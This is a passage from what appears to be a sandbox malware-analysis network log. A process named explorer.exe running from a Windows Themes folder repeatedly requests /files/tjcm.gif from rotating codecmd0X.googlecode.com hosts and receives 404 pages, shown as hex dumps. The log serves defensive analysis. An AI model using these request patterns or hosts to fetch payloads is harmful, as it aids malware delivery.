                                              66192.168.2.651217173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:44.727940083 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:46.257118940 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:45 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:46.257230043 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:46.257240057 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:09:46.257771969 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:45 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:46.258558035 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:45 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              67192.168.2.651218108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:47.410463095 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:48.126341105 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:48 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:48.126358986 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              68192.168.2.65121964.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:48.673619032 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:49.375926018 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:49 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:49.376518965 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              69192.168.2.651220173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:50.580930948 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:51.264306068 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:51 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:51.264338017 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              70192.168.2.651221108.177.15.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:51.779623032 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:52.491204977 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:52 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:09:52.491230965 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              71192.168.2.65122264.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:09:52.914417982 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:09:53.645720959 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:09:53 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 